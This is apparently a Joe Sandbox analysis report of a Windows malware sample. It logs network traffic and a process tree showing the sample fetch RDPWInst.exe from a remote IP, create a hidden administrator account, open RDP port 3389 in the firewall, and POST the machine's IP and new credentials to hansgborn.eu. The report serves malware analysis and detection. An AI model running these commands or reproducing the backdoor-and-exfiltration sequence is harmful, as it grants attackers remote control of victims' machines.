Oct 8, 2024 03:23:43.174551010 CEST | 53 | 56591 | 1.1.1.1 | 192.168.2.8
Oct 8, 2024 03:23:43.871272087 CEST | 62243 | 53 | 192.168.2.8 | 1.1.1.1
Oct 8, 2024 03:23:43.884118080 CEST | 53 | 62243 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 03:23:43.018959045 CEST | 192.168.2.8 | 1.1.1.1 | 0xdb0e | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:23:43.871272087 CEST | 192.168.2.8 | 1.1.1.1 | 0xbd7e | Standard query (0) | hansgborn.eu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 03:23:43.174551010 CEST | 1.1.1.1 | 192.168.2.8 | 0xdb0e | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:23:43.174551010 CEST | 1.1.1.1 | 192.168.2.8 | 0xdb0e | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:23:43.174551010 CEST | 1.1.1.1 | 192.168.2.8 | 0xdb0e | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:23:43.884118080 CEST | 1.1.1.1 | 192.168.2.8 | 0xbd7e | No error (0) | hansgborn.eu | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:23:43.884118080 CEST | 1.1.1.1 | 192.168.2.8 | 0xbd7e | No error (0) | hansgborn.eu | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                              • hansgborn.eu
                                                                              • 147.45.44.104
                                                                              • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 147.45.44.104 | 80 | 2444 | C:\Users\user\Desktop\hloRQZmlfg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:23:03.960208893 CEST | 94 | OUT | GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                                              Host: 147.45.44.104
                                                                              Connection: Keep-Alive
Oct 8, 2024 03:23:04.578062057 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Tue, 08 Oct 2024 01:23:04 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 1785344
                                                                              Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                                              Connection: keep-alive
                                                                              Keep-Alive: timeout=120
                                                                              ETag: "66f55533-1b3e00"
                                                                              X-Content-Type-Options: nosniff
                                                                              Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 104.26.12.205 | 80 | 2444 | C:\Users\user\Desktop\hloRQZmlfg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:23:43.182337046 CEST | 63 | OUT | GET / HTTP/1.1
                                                                              Host: api.ipify.org
                                                                              Connection: Keep-Alive
Oct 8, 2024 03:23:43.656218052 CEST | 227 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 01:23:43 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 11
                                                                              Connection: keep-alive
                                                                              Vary: Origin
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf253c5697b43ff-EWR
                                                                              Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                              Data Ascii: 8.46.123.33
Oct 8, 2024 03:23:43.669517040 CEST | 39 | OUT | GET / HTTP/1.1
                                                                              Host: api.ipify.org
Oct 8, 2024 03:23:43.773303986 CEST | 227 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 01:23:43 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 11
                                                                              Connection: keep-alive
                                                                              Vary: Origin
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf253c63a7043ff-EWR
                                                                              Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                              Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 188.114.96.3 | 443 | 2444 | C:\Users\user\Desktop\hloRQZmlfg.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:23:44 UTC | 166 | OUT | POST /receive.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: hansgborn.eu
                                                                              Content-Length: 193
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
2024-10-08 01:23:44 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-08 01:23:44 UTC | 193 | OUT | Data Ascii: ip=8.46.123.33&user=RDPUser_1e47a393&password=GEdtvn58rfdr&os_name=Windows+10+Pro&processor=Intel(R)+Core(TM)2+CPU+6600+%40+2.40+GHz&cores=4&gpu=3U2EAS21&gpu_memory=1024&ram=4095&disk_space=383
2024-10-08 01:23:44 UTC | 717 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Tue, 08 Oct 2024 01:23:44 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n78Cuf5jALD%2BIbhiTCL4zbEwvNVt7zS7jEAlYva6PGfsrEFdGWZ5N3o80l8KBOuvC9cd%2FGlXNVidCcCS5S7I%2Fs3dcjDUXlBY9rTtQnB2KT6vpZPClKSJuOLsjYLOJus%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf253cb5d417c8d-EWR
                                                                              92
                                                                              <html>
                                                                              <head><title>404 Not Found</title></head>
                                                                              <body>
                                                                              <center><h1>404 Not Found</h1></center>
                                                                              <hr><center>nginx</center>
                                                                              </body>
                                                                              </html>
2024-10-08 01:23:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (Data Ascii: 0, the terminating chunk)



                                                                              Target ID:0
                                                                              Start time:21:23:01
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\hloRQZmlfg.exe"
                                                                              Imagebase:0x880000
                                                                              File size:76'800 bytes
                                                                              MD5 hash:CEE4E023E6AFAAA51F600CAEC3469215
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net user
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net user
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 user
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:21:23:04
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:21:23:04
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:21:23:04
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                              Imagebase:0x400000
                                                                              File size:1'785'344 bytes
                                                                              MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000000.1434233686.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000008.00000000.1434308891.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 68%, ReversingLabs
                                                                              • Detection: 78%, Virustotal, Browse
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\netsh.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                              Imagebase:0x7ff607d80000
                                                                              File size:96'768 bytes
                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:32'600 bytes
                                                                              MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:13
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:169'984 bytes
                                                                              MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:16
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:137'728 bytes
                                                                              MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:21
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net user RDPUser_1e47a393 GEdtvn58rfdr /add
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:25
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net localgroup
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:26
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:27
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net localgroup
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 localgroup
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:30
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:31
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                              Imagebase:0x15c0000
                                                                              File size:82'432 bytes
                                                                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:32
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:33
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:34
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net localgroup "Administrators" RDPUser_1e47a393 /add
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:35
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:21:23:43
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
                                                                              Imagebase:0x900000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o$(o$(o$(o
                                                                                • API String ID: 0-3218871382
                                                                                • Opcode ID: 1ab2048f5c1328a45535cd25aa0e4160154edc4567655737aed7ab10895f3e3e
                                                                                • Instruction ID: 0e90b7c6ab10a1d1e0e6658b1b23c05e5c6eb1982bf64ff24fa8de98f91b04d1
                                                                                • Opcode Fuzzy Hash: 1ab2048f5c1328a45535cd25aa0e4160154edc4567655737aed7ab10895f3e3e
                                                                                • Instruction Fuzzy Hash: 35E14B74A002058FCB15EFA9D584A9EBBF2EF89310B1485A9E406EF365DF30AD49CF51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o$(o$(o$(o
                                                                                • API String ID: 0-3218871382
                                                                                • Opcode ID: 552d891a400081f7f91d1709dbfe3e91d9a7e70e20e06623641c186cf25916d1
                                                                                • Instruction ID: 2aae4a19e1bfade281d95585918d0330b4a85c093187682901d0de2939480e1a
                                                                                • Opcode Fuzzy Hash: 552d891a400081f7f91d1709dbfe3e91d9a7e70e20e06623641c186cf25916d1
                                                                                • Instruction Fuzzy Hash: D8719135B006018FEB18EB7A881176EB7E6EFCA700F14856DD456AB394DE35EC05CBA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o$(o$(o$(o
                                                                                • API String ID: 0-3218871382
                                                                                • Opcode ID: 31ae1260ab28e48c6be4ef6f54148dfc6ddaee558b3c852bc9c9d3123f45fa2b
                                                                                • Instruction ID: 321b586b8cb3c5d3e61871c0b0f185cd49b659db6d877ccb457d0eee49c62b1f
                                                                                • Opcode Fuzzy Hash: 31ae1260ab28e48c6be4ef6f54148dfc6ddaee558b3c852bc9c9d3123f45fa2b
                                                                                • Instruction Fuzzy Hash: D1216F31A002059FCF24DF69C845A9AFBF6FF8A300B0485ADE55AA7691DB74EC08CF51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: pP
                                                                                • API String ID: 0-2161046187
                                                                                • Opcode ID: beefe3ceaa15f260033d11a169b78cd56c9993c7cb3fa221e7442e754353a1be
                                                                                • Instruction ID: f9923841e7591a5560c93ba22b01a58cb61cb49994f8e4bb48f3602da79f884d
                                                                                • Opcode Fuzzy Hash: beefe3ceaa15f260033d11a169b78cd56c9993c7cb3fa221e7442e754353a1be
                                                                                • Instruction Fuzzy Hash: B721A131E05218AFDF05DFA5D980ADEBBF6EF89310F148166E802B7242DB316D04CB54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: pP
                                                                                • API String ID: 0-2161046187
                                                                                • Opcode ID: f52f70a0d6ff9c7168fe68138fd033712ad440606225e3c7371c57cdbc2f4e41
                                                                                • Instruction ID: b304400405e08417aab43ef23ff65619c9eb807a215e2d2b83aabc47df59f3a7
                                                                                • Opcode Fuzzy Hash: f52f70a0d6ff9c7168fe68138fd033712ad440606225e3c7371c57cdbc2f4e41
                                                                                • Instruction Fuzzy Hash: DB216031E05218AFDF05DFA5D980ADEBBF6EF89310F14816AE902B7246DA316D04CB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *
                                                                                • API String ID: 0-2709624293
                                                                                • Opcode ID: 3df1f9bacef2ed5de193ba6f410f295afa52c122b2df125e630bb46499b55746
                                                                                • Instruction ID: 6ab7d32ebee6ba0ec8724f6c2a52d0055a36bec32b8fb41537470e7e6d9f23e1
                                                                                • Opcode Fuzzy Hash: 3df1f9bacef2ed5de193ba6f410f295afa52c122b2df125e630bb46499b55746
                                                                                • Instruction Fuzzy Hash: AF215B70A002099FDB04FBA5D892BAE7BB2FBC9701F509529D901BB255EF706E04CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *
                                                                                • API String ID: 0-2709624293
                                                                                • Opcode ID: 36edff77ecef75f4bc6d6b099c11929a32973b7b43ad98257abb09d16a0b9573
                                                                                • Instruction ID: 6b0f8312951e9e387dfa0bcb9cc0ae89756716325159fba54c480f4f67b791d8
                                                                                • Opcode Fuzzy Hash: 36edff77ecef75f4bc6d6b099c11929a32973b7b43ad98257abb09d16a0b9573
                                                                                • Instruction Fuzzy Hash: 81215C74A002099FDB04EBA5D892AAFBBB2FBC8701F109525D501BB295DF706E04CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
